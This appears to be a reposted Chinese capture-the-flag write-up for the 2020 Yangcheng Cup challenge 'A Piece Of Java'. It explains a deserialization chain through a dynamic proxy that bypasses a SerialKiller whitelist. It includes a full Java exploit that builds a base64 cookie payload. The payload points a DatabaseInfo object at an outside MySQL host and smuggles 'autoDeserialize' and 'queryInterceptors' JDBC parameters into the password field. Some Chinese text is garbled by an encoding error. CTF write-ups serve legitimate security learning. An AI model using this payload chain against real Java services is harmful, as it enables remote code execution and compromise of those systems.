[羊城杯 2020]A Piece Of Java

源碼邏輯不難，在hello路由對設(shè)置cookie鍵名為data進(jìn)行反序列化

問題是用的是seriakiller進(jìn)行的反序列化，并且用的白名單限制。

雖然題目自帶了CC但是因?yàn)檫@個設(shè)置沒法直接用。

看一下題目給的條件，有個InfoInvocationHandler

package gdufs.challenge.web.invocation;import gdufs.challenge.web.model.Info; import java.io.Serializable; import java.lang.reflect.InvocationHandler; import java.lang.reflect.Method;public class InfoInvocationHandler implements InvocationHandler, Serializable {private Info info;public InfoInvocationHandler(Info info) {this.info = info;}public Object invoke(Object proxy, Method method, Object[] args) {try {if (method.getName().equals("getAllInfo") &&!this.info.checkAllInfo().booleanValue())return null;return method.invoke(this.info, args);} catch (Exception e) {e.printStackTrace();return null;}} }

這個invoke肯定是能利用的，關(guān)鍵就在這

回到剛剛的hello路由，反序列化之后調(diào)用了info.getAllInfo()

Info info = (Info)deserialize(cookieData);if (info != null)model.addAttribute("info", info.getAllInfo());

再看給的DatabaseInfo類

所以思路很明確，利用動態(tài)代理觸發(fā)InfoInvocationHandler的invoke方法，之后觸發(fā)connect進(jìn)行jdbc反序列化

調(diào)用鏈

反序列化->info.getAllinfo()->(動態(tài)代理)InfoInvocationHandler.invoke()->Databaseinfo.checkAllInfo()->Databaseinfo->connect()

這里最開始想的是利用惡意mysql讀文件的，但貌似某個配置沒開所以沒成功。

寫exp

package YCB2020;import gdufs.challenge.web.invocation.InfoInvocationHandler; import gdufs.challenge.web.model.DatabaseInfo; import gdufs.challenge.web.model.Info; import org.nibblesec.tools.SerialKiller;import java.io.ByteArrayInputStream; import java.io.ByteArrayOutputStream; import java.io.ObjectInputStream; import java.io.ObjectOutputStream; import java.lang.reflect.Constructor; import java.lang.reflect.Field; import java.lang.reflect.Proxy; import java.util.Base64;public class exp {public static void setFieldValue(Object obj, String fieldname, Object value) throws Exception{Field field = obj.getClass().getDeclaredField(fieldname);field.setAccessible(true);field.set(obj,value);} // public static void unserialize(byte[] bytes) throws Exception{ // try(ByteArrayInputStream bain = new ByteArrayInputStream(bytes); // ObjectInputStream oin = new ObjectInputStream(bain)){ // oin.readObject(); // } // }public static Object unserialize(byte[] bytes) throws Exception{Object obj;try(ByteArrayInputStream bain = new ByteArrayInputStream(bytes);ObjectInputStream oin = new ObjectInputStream(bain)){obj = oin.readObject();return obj;}}public static byte[] serialize(Object o) throws Exception{try(ByteArrayOutputStream baout = new ByteArrayOutputStream();ObjectOutputStream oout = new ObjectOutputStream(baout)){oout.writeObject(o);return baout.toByteArray();}}// private static Object deserialize(String base64data) { // Object obj; // ByteArrayInputStream bais = new ByteArrayInputStream(Base64.getDecoder().decode(base64data)); // try { // SerialKiller serialKiller = new SerialKiller(bais, "/Users/fmyyy/tools/serialkiller.conf"); // obj = serialKiller.readObject(); // serialKiller.close(); // } catch (Exception e) { // e.printStackTrace(); // return null; // } // return obj; // }public static void main(String[] args) throws Exception {Info databaseInfo = new DatabaseInfo();setFieldValue(databaseInfo, "host", "47.101.176.40");setFieldValue(databaseInfo, "port", "33060");setFieldValue(databaseInfo, "username", "fmyyy");setFieldValue(databaseInfo, "password", "fmyyy&autoDeserialize=true&queryInterceptors=com.mysql.cj.jdbc.interceptors.ServerStatusDiffInterceptor");Class clazz = Class.forName("gdufs.challenge.web.invocation.InfoInvocationHandler");Constructor construct = clazz.getDeclaredConstructor(Info.class);construct.setAccessible(true); // System.out.println("123");InfoInvocationHandler handler = (InfoInvocationHandler) construct.newInstance(databaseInfo);Info proxinfo = (Info) Proxy.newProxyInstance(Info.class.getClassLoader(), new Class[] {Info.class}, handler);byte[] bytes = serialize(proxinfo);byte[] payload = Base64.getEncoder().encode(bytes);System.out.print(new String(payload)); // Info info1 = (Info)deserialize(new String(payload)); // info1.getAllInfo();} }

惡意mysql和jdbc反序列化的利用參考https://ego00.blog.csdn.net/article/details/120963327

總結(jié)

以上是生活随笔為你收集整理的[羊城杯 2020]A Piece Of Java的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯，歡迎將生活随笔推薦給好友。